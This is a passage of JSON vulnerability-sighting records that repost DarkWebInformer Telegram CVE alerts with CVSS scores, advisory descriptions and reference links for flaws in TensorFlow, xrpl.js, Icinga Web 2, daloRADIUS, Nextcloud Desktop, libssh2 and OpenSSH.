"content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-43850\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: Discourse is an open source platform for community discussion. In affected versions admins users can trigger a Denial of Service attack via the `/message-bus/_diagnostics` path. The impact of this vulnerability is greater on multisite Discourse instances (where multiple forums are served from a single application server) where any admin user on any of the forums are able to visit the `/message-bus/_diagnostics` path. The problem has been patched. Please upgrade to 2.8.0.beta10 or 2.7.12. No workarounds for this issue exist.\n\ud83d\udccf Published: 2022-01-04T19:35:11.000Z\n\ud83d\udccf Modified: 2025-04-22T18:34:44.857Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-59jr-pj65-qmvr\n2. https://github.com/discourse/discourse/commit/7a8ec129fb54f188b2da6588c9d24d3a36eb0d39", "creation_timestamp": "2025-04-22T19:03:41.000000Z"}, {"uuid": "6d8146be-c7fb-4510-b1b2-fa57e1ac086d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VC89-HCCF-RQ55", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12949", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-21653\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Jawn is an open source JSON parser. Extenders of the `org.typelevel.jawn.SimpleFacade` and `org.typelevel.jawn.MutableFacade` who don't override `objectContext()` are vulnerable to a hash collision attack which may result in a denial of service. Most applications do not implement these traits directly, but inherit from a library. `jawn-parser-1.3.1` fixes this issue and users are advised to upgrade. For users unable to upgrade override `objectContext()` to use a collision-safe collection.\n\ud83d\udccf Published: 2022-01-05T21:00:12.000Z\n\ud83d\udccf Modified: 2025-04-22T18:34:05.348Z\n\ud83d\udd17 References:\n1. https://github.com/typelevel/jawn/security/advisories/GHSA-vc89-hccf-rq55\n2. https://github.com/typelevel/jawn/pull/390", "creation_timestamp": "2025-04-22T19:03:45.000000Z"}, {"uuid": "60708c41-5501-46af-9869-ea2c29d3d5f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93JC-VQQC-VVVH", "type": "seen", "source": "Telegram/jO9dryZvE_S5E-_gtLxGYUB48gMevmZpZHBZ7ROvZGlwCxA", "content": "", "creation_timestamp": "2026-01-02T18:53:14.000000Z"}, {"uuid": "2a451cc6-f01b-45b2-ab3d-31301d9c261c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37JF-MJV6-XFQW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13084", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35999\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `Conv2DBackpropInput` receives empty `out_backprop` inputs (e.g. `[3, 1, 0, 1]`), the current CPU/GPU kernels `CHECK` fail (one with dnnl, the other with cudnn). This can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 27a65a43cf763897fecfa5cdb5cc653fc5dd0346. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:15:28.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:08.848Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-37jf-mjv6-xfqw\n2. https://github.com/tensorflow/tensorflow/commit/27a65a43cf763897fecfa5cdb5cc653fc5dd0346", "creation_timestamp": "2025-04-23T17:04:58.000000Z"}, {"uuid": "fbdb5008-2090-4ce2-bd17-adbc3bf782b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99J7-MHFH-W84P", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13095", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31162\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Slack Morphism is an async client library for Rust. Prior to 0.41.0, it was possible for Slack OAuth client information to leak in application debug logs. Stricter and more secure debug formatting was introduced in v0.41.0 for OAuth secret types to reduce the possibility of printing sensitive information in application logs. As a workaround, do not print/output requests and responses for OAuth and client configurations in logs.\n\ud83d\udccf Published: 2022-07-21T13:20:12.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:53.113Z\n\ud83d\udd17 References:\n1. https://github.com/abdolence/slack-morphism-rust/security/advisories/GHSA-99j7-mhfh-w84p\n2. https://github.com/abdolence/slack-morphism-rust/releases/tag/v0.41.0", "creation_timestamp": "2025-04-23T18:05:30.000000Z"}, {"uuid": "a73d322a-5091-43cb-bba3-9b86bebfce87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33QR-M49Q-RXFX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12980", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32965\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: xrpl.js is a JavaScript/TypeScript API for interacting with the XRP Ledger in Node.js and the browser. Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions. Anyone who used one of these versions should stop immediately and rotate any private keys or secrets used with affected systems. Users of xrpl.js should pgrade to version 4.2.5 or 2.14.3 to receive a patch. To secure funds, think carefully about whether any keys may have been compromised by this supply chain attack, and mitigate by sending funds to secure wallets, and/or rotating keys. If any account's master key is potentially compromised, disable the key.\n\ud83d\udccf Published: 2025-04-22T20:39:48.452Z\n\ud83d\udccf Modified: 2025-04-22T20:39:48.452Z\n\ud83d\udd17 References:\n1. https://github.com/XRPLF/xrpl.js/security/advisories/GHSA-33qr-m49q-rxfx\n2. https://www.aikido.dev/blog/xrp-supplychain-attack-official-npm-package-infected-with-crypto-stealing-backdoor\n3. https://xrpl.org/docs/tutorials/how-tos/manage-account-settings/assign-a-regular-key-pair\n4. https://xrpl.org/docs/tutorials/how-tos/manage-account-settings/disable-master-key-pair", "creation_timestamp": "2025-04-22T21:04:20.000000Z"}, {"uuid": "fd52a0a0-4a48-4855-9144-67164780e263", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FV43-93GV-VM8F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13090", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36011\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `mlir::tfg::ConvertGenericFunctionToFunctionDef` is given empty function attributes, it gives a null dereference. We have patched the issue in GitHub commit 1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:30:21.000Z\n\ud83d\udccf Modified: 2025-04-23T16:59:29.191Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fv43-93gv-vm8f\n2. https://github.com/tensorflow/tensorflow/commit/1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b", "creation_timestamp": "2025-04-23T17:05:06.000000Z"}, {"uuid": "61b83121-e3db-4516-b81e-8edf5a812c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V9MV-H52F-7G63", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13123", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24715\n\ud83d\udd25 CVSS Score: 8.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2. Users unable to upgrade should limit access to the Icinga Web 2 configuration.\n\ud83d\udccf Published: 2022-03-08T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-23T18:58:50.966Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2/security/advisories/GHSA-v9mv-h52f-7g63\n2. https://github.com/Icinga/icingaweb2/commit/a06d915467ca943a4b406eb9587764b8ec34cafb\n3. https://security.gentoo.org/glsa/202208-05\n4. http://packetstormsecurity.com/files/173516/Icinga-Web-2.10-Remote-Code-Execution.html", "creation_timestamp": "2025-04-23T19:05:20.000000Z"}, {"uuid": "7f6c3ace-8563-4211-96a7-430d8c017fba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1652", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3863\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in libssh2 before 1.8.1. A server could send a multiple keyboard interactive response messages whose total length are greater than unsigned char max characters. This value is used as an index to copy memory causing in an out of bounds memory write error.\n\ud83d\udccf Published: 2019-03-25T17:52:10.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:19.703Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3863\n2. https://www.libssh2.org/CVE-2019-3863.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:44.000000Z"}, {"uuid": "34204161-2ca1-4491-96fc-7a6ed4e98aef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FV25-WRFF-WF86", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12925", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29191\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.GetSessionTensor` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T20:50:11.000Z\n\ud83d\udccf Modified: 2025-04-22T18:00:23.414Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fv25-wrff-wf86\n6. https://github.com/tensorflow/tensorflow/commit/48305e8ffe5246d67570b64096a96f8e315a7281\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L94-L112", "creation_timestamp": "2025-04-22T18:03:42.000000Z"}, {"uuid": "09c06a4a-3d9b-414d-a6c7-09db43a23b13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MH3M-62V7-68XG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13076", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36002\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `Unbatch` receives a nonscalar input `id`, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 4419d10d576adefa36b0e0a9425d2569f7c0189f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:10:15.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:58.965Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mh3m-62v7-68xg\n2. https://github.com/tensorflow/tensorflow/commit/4419d10d576adefa36b0e0a9425d2569f7c0189f", "creation_timestamp": "2025-04-23T17:04:48.000000Z"}, {"uuid": "ddac291c-ec28-43ed-a0e9-991517150c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9XX-6MVW-9V84", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12890", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23475\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: daloRADIUS is an open source RADIUS web management application. daloRadius 1.3 and prior are vulnerable to a combination cross site scripting (XSS) and cross site request forgery (CSRF) vulnerability which leads to account takeover in the mng-del.php file because of an unescaped variable reflected in the DOM on line 116. This issue has been addressed in commit `ec3b4a419e`. Users are advised to manually apply the commit in order to mitigate this issue. Users may also mitigate this issue with in two parts 1) The CSRF vulnerability can be mitigated  by making the daloRadius session cookie to samesite=Lax or by the implimentation of a CSRF token in all forms. 2) The XSS vulnerability may be mitigated by escaping it or by introducing a Content-Security policy.\n\n\n\n\ud83d\udccf Published: 2022-12-06T19:13:36.217Z\n\ud83d\udccf Modified: 2025-04-22T15:58:29.584Z\n\ud83d\udd17 References:\n1. https://github.com/lirantal/daloradius/security/advisories/GHSA-c9xx-6mvw-9v84\n2. https://github.com/lirantal/daloradius/commit/ec3b4a419e20540cf28ce60e48998b893e3f1dea", "creation_timestamp": "2025-04-22T16:03:36.000000Z"}, {"uuid": "ee440bce-ba79-4905-adba-7a19e876657c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-92P9-X79H-2MJ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12877", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-39333\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Nexcloud desktop is the Desktop sync client for Nextcloud. An attacker can inject arbitrary HyperText Markup Language into the Desktop Client application. It is recommended that the Nextcloud Desktop client is upgraded to 3.6.1. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-11-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T16:00:06.854Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/desktop/pull/4972\n2. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-92p9-x79h-2mj8\n3. https://hackerone.com/reports/1711847", "creation_timestamp": "2025-04-22T16:03:15.000000Z"}, {"uuid": "76672ebb-af3e-4695-aff1-425644e77034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H48F-Q7RW-HVR7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12933", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29195\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.StagePeek` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `index` is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T22:00:15.000Z\n\ud83d\udccf Modified: 2025-04-22T17:58:58.035Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h48f-q7rw-hvr7\n6. https://github.com/tensorflow/tensorflow/commit/cebe3c45d76357d201c65bdbbf0dbe6e8a63bbdb\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/stage_op.cc#L26", "creation_timestamp": "2025-04-22T18:03:52.000000Z"}, {"uuid": "cf20149c-0629-4862-90cd-c2d660a17139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3MP-6VRJ-875G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12938", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32959\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: CUBA Platform is a high level framework for enterprise applications development. Prior to version 7.2.23, the local file storage implementation does not restrict the size of uploaded files. An attacker could exploit this by uploading excessively large files, potentially causing the server to run out of space and return HTTP 500 error, resulting in a denial of service. This issue has been patched in version 7.2.23. A workaround is provided on the Jmix documentation website.\n\ud83d\udccf Published: 2025-04-22T17:45:00.340Z\n\ud83d\udccf Modified: 2025-04-22T18:50:33.199Z\n\ud83d\udd17 References:\n1. https://github.com/cuba-platform/cuba/security/advisories/GHSA-w3mp-6vrj-875g\n2. https://github.com/jmix-framework/jmix/security/advisories/GHSA-f3gv-cwwh-758m\n3. https://github.com/cuba-platform/cuba/commit/42b6c00fd0572b8e52ae31afd1babc827a3161a1\n4. https://docs.jmix.io/jmix/files-vulnerabilities.html\n5. https://docs.jmix.io/jmix/files-vulnerabilities.html#disable-files-endpoint-in-cuba-application", "creation_timestamp": "2025-04-22T19:03:28.000000Z"}, {"uuid": "e3e732d3-d2d3-4790-bdac-47b35ce26b61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9F6-4R6R-H74P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12875", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-39332\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Nexcloud desktop is the Desktop sync client for Nextcloud. An attacker can inject arbitrary HyperText Markup Language into the Desktop Client application via user status and information. It is recommended that the Nextcloud Desktop client is upgraded to 3.6.1. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-11-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T16:00:19.395Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-q9f6-4r6r-h74p\n2. https://github.com/nextcloud/desktop/pull/4972\n3. https://hackerone.com/reports/1707977", "creation_timestamp": "2025-04-22T16:03:13.000000Z"}, {"uuid": "e655f379-0d0f-407c-85d8-a12b6c7f690d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CR2-8PWR-FHFQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13074", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36026\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. If `QuantizeAndDequantizeV3` is given a nonscalar `num_bits` input tensor, it results in a `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit f3f9cb38ecfe5a8a703f2c4a8fead434ef291713. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:05:20.000Z\n\ud83d\udccf Modified: 2025-04-23T17:01:11.089Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9cr2-8pwr-fhfq\n2. https://github.com/tensorflow/tensorflow/commit/f3f9cb38ecfe5a8a703f2c4a8fead434ef291713", "creation_timestamp": "2025-04-23T17:04:43.000000Z"}, {"uuid": "7aad79c7-3836-4267-b378-99b77c7d1342", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6CV-4FMF-66XF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13073", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36018\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. If `RaggedTensorToVariant` is given a `rt_nested_splits` list that contains tensors of ranks other than one, it results in a `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 88f93dfe691563baa4ae1e80ccde2d5c7a143821. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:05:15.000Z\n\ud83d\udccf Modified: 2025-04-23T17:01:17.051Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m6cv-4fmf-66xf\n2. https://github.com/tensorflow/tensorflow/commit/88f93dfe691563baa4ae1e80ccde2d5c7a143821", "creation_timestamp": "2025-04-23T17:04:42.000000Z"}, {"uuid": "2463bde1-675f-4d46-8717-e0ef14678d6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5993-7P27-66G5", "type": "published-proof-of-concept", "source": "Telegram/mK8o9C1rhrHkVcM37GZHvLPW6XA5mG-AmvsJea-RQorcPsU", "content": "", "creation_timestamp": "2026-01-02T21:52:17.000000Z"}, {"uuid": "ead1fb92-6c5d-4fa4-a522-57b0678fd5a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7FF-CFC9-WMMH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35990\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient` receives input `min` or `max` of rank other than 1, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:00:12.000Z\n\ud83d\udccf Modified: 2025-04-23T17:01:29.664Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h7ff-cfc9-wmmh\n2. https://github.com/tensorflow/tensorflow/commit/f3cf67ac5705f4f04721d15e485e192bb319feed", "creation_timestamp": "2025-04-23T17:04:40.000000Z"}, {"uuid": "7b23b320-807b-41b1-a3fa-12be8d448689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4389", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. 